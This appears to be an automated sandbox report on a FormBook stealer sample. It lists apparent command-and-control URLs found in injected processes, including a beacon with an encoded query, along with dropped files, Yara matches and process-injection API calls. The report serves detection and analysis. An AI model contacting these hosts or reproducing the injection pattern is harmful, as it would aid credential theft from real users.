      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.comoganhodinheiro.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.draconiandiesel.info
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.draconiandiesel.info/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.draconiandiesel.info/kkx/www.campingcasa.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.draconiandiesel.infoReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.easyamazonmail.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.easyamazonmail.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.easyamazonmail.com/kkx/www.atechels.net
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.easyamazonmail.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.faketaxiholland.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.faketaxiholland.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.faketaxiholland.com/kkx/www.draconiandiesel.info
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.faketaxiholland.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.ggqrcm.online
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.ggqrcm.online/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.ggqrcm.online/kkx/www.maikanetaka.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.ggqrcm.onlineReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp, wininit.exe, 00000004.00000002.2697777774.01AE9000.00000004.00000001.sdmpString found in binary or memory: http://www.livetruntknutenblogg.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmp, wininit.exe, 00000004.00000002.2697777774.01AE9000.00000004.00000001.sdmpString found in binary or memory: http://www.livetruntknutenblogg.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.livetruntknutenblogg.com/kkx/www.thecoffeecup.kiwi
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.livetruntknutenblogg.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.maikanetaka.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.maikanetaka.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.maikanetaka.com/kkx/www.comoganhodinheiro.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.maikanetaka.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.midlandtxcandles.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.midlandtxcandles.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.midlandtxcandles.com/kkx/www.therichnurse.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.midlandtxcandles.comReferer:
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.pensah.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.pensah.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.pensah.com/kkx/www.easyamazonmail.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.pensah.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.thecoffeecup.kiwi
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.thecoffeecup.kiwi/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.thecoffeecup.kiwi/kkx/www.xn--24tw29b3pc.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.thecoffeecup.kiwiReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.com/kkx/www.faketaxiholland.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.therichnurse.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.com/kkx/www.pensah.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.villanuevacommunications.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--24tw29b3pc.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--24tw29b3pc.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--24tw29b3pc.comReferer:
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.com/kkx/
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.com/kkx/www.livetruntknutenblogg.com
      Source: explorer.exe, 00000003.00000002.2698565981.01C90000.00000004.00000001.sdmpString found in binary or memory: http://www.yofdyk.comReferer:
      Source: wininit.exe, 00000004.00000003.1388975198.00650000.00000004.00000001.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
      Source: wininit.exe, 00000004.00000002.2697877520.01DDF000.00000004.00000001.sdmpString found in binary or memory: https://www.comoganhodinheiro.com/kkx/?3fF8Bb=an/3nFwlmuh8GBUGJOd9Y7dWGi7RXgMeqzUW/F2v8zHWXFzxfnYdys
      Source: wininit.exe, 00000004.00000003.1387588978.005D0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1539233364.00030000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1539422251.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1390601976.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2702578042.03C20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1523518068.00030000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.970738080.006A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2696183744.001D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2695859455.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1523696414.00060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2696313938.00200000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\System32\wininit.exeDropped file: C:\Users\user\AppData\Roaming\N3OPRO98\N3Ologri.iniJump to dropped file
      Source: C:\Windows\System32\wininit.exeDropped file: C:\Users\user\AppData\Roaming\N3OPRO98\N3Ologrv.iniJump to dropped file
      Source: C:\Program Files\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\N3OPRO98\N3Ologrf.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1542166839.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.972877860.1D9D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.1390735301.004AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000B.00000002.1539233364.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.1539233364.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.1539422251.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.1539422251.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.2696504455.00253000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000007.00000002.1390601976.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.1390601976.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.2702578042.03C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.2702578042.03C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.1523518068.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.1523518068.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.970738080.006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.970738080.006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.2696183744.001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.2696183744.001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.2695859455.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.2695859455.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.1523696414.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.1523696414.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.2697694573.0196F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000004.00000002.2696313938.00200000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.2696313938.00200000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 0_2_00206E91 NtResumeThread,0_2_00206E91
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 0_2_002022FC NtWriteVirtualMemory,0_2_002022FC
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 0_2_002063FF NtProtectVirtualMemory,0_2_002063FF
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 0_2_0020057A NtSetInformationThread,TerminateProcess,0_2_0020057A
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 0_2_00202352 NtWriteVirtualMemory,0_2_00202352
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 0_2_00202582 NtWriteVirtualMemory,0_2_00202582
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5E80 NtReadFile,NtReadFile,1_2_1EAE5E80
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5EC0 NtReadVirtualMemory,NtReadVirtualMemory,1_2_1EAE5EC0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5E40 NtQueueApcThread,NtQueueApcThread,1_2_1EAE5E40
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5C10 NtQueryInformationProcess,NtQueryInformationProcess,1_2_1EAE5C10
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5DC0 NtQuerySystemInformation,NtQuerySystemInformation,1_2_1EAE5DC0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE57F0 NtMapViewOfSection,NtMapViewOfSection,1_2_1EAE57F0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE55A0 NtFreeVirtualMemory,1_2_1EAE55A0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE52B0 NtCreateSection,NtCreateSection,1_2_1EAE52B0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5390 NtDelayExecution,NtDelayExecution,1_2_1EAE5390
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5090 NtClose,NtClose,1_2_1EAE5090
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5190 NtCreateFile,NtCreateFile,1_2_1EAE5190
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,1_2_1EAE4EA0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,1_2_1EAE4E30
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE6460 NtSuspendThread,NtSuspendThread,1_2_1EAE6460
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE6580 NtUnmapViewOfSection,NtUnmapViewOfSection,1_2_1EAE6580
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE6070 NtResumeThread,NtResumeThread,1_2_1EAE6070
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE6130 NtSetContextThread,NtSetContextThread,1_2_1EAE6130
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5E20 NtQueryVirtualMemory,1_2_1EAE5E20
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5E10 NtQueryValueKey,1_2_1EAE5E10
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5C40 NtQueryInformationToken,1_2_1EAE5C40
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5D50 NtQuerySection,1_2_1EAE5D50
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5AE0 NtProtectVirtualMemory,1_2_1EAE5AE0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5BE0 NtQueryInformationFile,1_2_1EAE5BE0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5860 NtOpenDirectoryObject,1_2_1EAE5860
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE59D0 NtOpenThread,1_2_1EAE59D0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5960 NtOpenProcessToken,1_2_1EAE5960
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5950 NtOpenProcess,1_2_1EAE5950
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE54B0 NtEnumerateKey,1_2_1EAE54B0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE54E0 NtEnumerateValueKey,1_2_1EAE54E0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE55E0 NtGetContextThread,1_2_1EAE55E0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5210 NtCreateMutant,1_2_1EAE5210
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE5270 NtCreateProcessEx,1_2_1EAE5270
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE51D0 NtCreateKey,1_2_1EAE51D0
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE6630 NtWriteFile,1_2_1EAE6630
      Source: C:\Users\user\Desktop\tilmelding.exeCode function: 1_2_1EAE6660 NtWriteVirtualMemory,1_2_1EAE6660
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5090 NtClose,NtClose,4_2_008B5090
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B6070 NtResumeThread,NtResumeThread,4_2_008B6070
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5190 NtCreateFile,NtCreateFile,4_2_008B5190
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B51D0 NtCreateKey,NtCreateKey,4_2_008B51D0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B6130 NtSetContextThread,NtSetContextThread,4_2_008B6130
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B52B0 NtCreateSection,NtCreateSection,4_2_008B52B0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B6200 NtSetInformationFile,NtSetInformationFile,4_2_008B6200
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5210 NtCreateMutant,NtCreateMutant,4_2_008B5210
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5390 NtDelayExecution,NtDelayExecution,4_2_008B5390
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B63D0 NtSetValueKey,NtSetValueKey,4_2_008B63D0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B54E0 NtEnumerateValueKey,NtEnumerateValueKey,4_2_008B54E0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B6460 NtSuspendThread,NtSuspendThread,4_2_008B6460
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B6580 NtUnmapViewOfSection,NtUnmapViewOfSection,4_2_008B6580
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B55A0 NtFreeVirtualMemory,4_2_008B55A0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B6630 NtWriteFile,NtWriteFile,4_2_008B6630
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B57F0 NtMapViewOfSection,NtMapViewOfSection,4_2_008B57F0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5C10 NtQueryInformationProcess,NtQueryInformationProcess,4_2_008B5C10
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5C40 NtQueryInformationToken,NtQueryInformationToken,4_2_008B5C40
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5DC0 NtQuerySystemInformation,NtQuerySystemInformation,4_2_008B5DC0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5E80 NtReadFile,NtReadFile,4_2_008B5E80
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,4_2_008B4EA0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5EC0 NtReadVirtualMemory,NtReadVirtualMemory,4_2_008B5EC0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5E10 NtQueryValueKey,NtQueryValueKey,4_2_008B5E10
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,4_2_008B4E30
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5E40 NtQueueApcThread,NtQueueApcThread,4_2_008B5E40
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5270 NtCreateProcessEx,4_2_008B5270
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B54B0 NtEnumerateKey,4_2_008B54B0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B55E0 NtGetContextThread,4_2_008B55E0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B65E0 NtWaitForSingleObject,4_2_008B65E0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B6660 NtWriteVirtualMemory,4_2_008B6660
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5860 NtOpenDirectoryObject,4_2_008B5860
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B59D0 NtOpenThread,4_2_008B59D0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5950 NtOpenProcess,4_2_008B5950
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5960 NtOpenProcessToken,4_2_008B5960
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5AE0 NtProtectVirtualMemory,4_2_008B5AE0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5BE0 NtQueryInformationFile,4_2_008B5BE0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5D50 NtQuerySection,4_2_008B5D50
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_008B5E20 NtQueryVirtualMemory,4_2_008B5E20
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00079830 NtCreateFile,4_2_00079830
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_000798E0 NtReadFile,4_2_000798E0
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00079960 NtClose,4_2_00079960
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00079A10 NtAllocateVirtualMemory,4_2_00079A10
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_0007982A NtCreateFile,4_2_0007982A
      Source: C:\Windows\System32\wininit.exeCode function: 4_2_00079A0C NtAllocateVirtualMemory,4_2_00079A0C
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FC830 NtCreateFile,7_2_000FC830
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FC960 NtClose,7_2_000FC960
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FC490 NtCreateSection,7_2_000FC490
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FC4E0 NtMapViewOfSection,7_2_000FC4E0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FC82A NtCreateFile,7_2_000FC82A
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000FC4D5 NtMapViewOfSection,7_2_000FC4D5
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D689A NtResumeThread,8_2_002D689A
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D22FC NtWriteVirtualMemory,8_2_002D22FC
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D63FF NtProtectVirtualMemory,8_2_002D63FF
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D057A NtSetInformationThread,TerminateProcess,8_2_002D057A
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D2352 NtWriteVirtualMemory,8_2_002D2352
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D2582 NtWriteVirtualMemory,8_2_002D2582
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D689D NtResumeThread,8_2_002D689D
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 8_2_002D69F6 NtResumeThread,8_2_002D69F6
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5E80 NtReadFile,NtReadFile,10_2_1EBC5E80
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5EC0 NtReadVirtualMemory,NtReadVirtualMemory,10_2_1EBC5EC0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5E40 NtQueueApcThread,NtQueueApcThread,10_2_1EBC5E40
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5C10 NtQueryInformationProcess,NtQueryInformationProcess,10_2_1EBC5C10
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5DC0 NtQuerySystemInformation,NtQuerySystemInformation,10_2_1EBC5DC0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC57F0 NtMapViewOfSection,NtMapViewOfSection,10_2_1EBC57F0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC55A0 NtFreeVirtualMemory,10_2_1EBC55A0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC52B0 NtCreateSection,NtCreateSection,10_2_1EBC52B0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5390 NtDelayExecution,NtDelayExecution,10_2_1EBC5390
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5090 NtClose,NtClose,10_2_1EBC5090
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5190 NtCreateFile,NtCreateFile,10_2_1EBC5190
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,10_2_1EBC4EA0
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,10_2_1EBC4E30
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC6460 NtSuspendThread,NtSuspendThread,10_2_1EBC6460
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC6580 NtUnmapViewOfSection,NtUnmapViewOfSection,10_2_1EBC6580
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC6070 NtResumeThread,NtResumeThread,10_2_1EBC6070
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC6130 NtSetContextThread,NtSetContextThread,10_2_1EBC6130
      Source: C:\Program Files\A_hh\gdiddfh.exeCode function: 10_2_1EBC5E20 NtQueryVirtualMemory,10_2_1EBC5E20
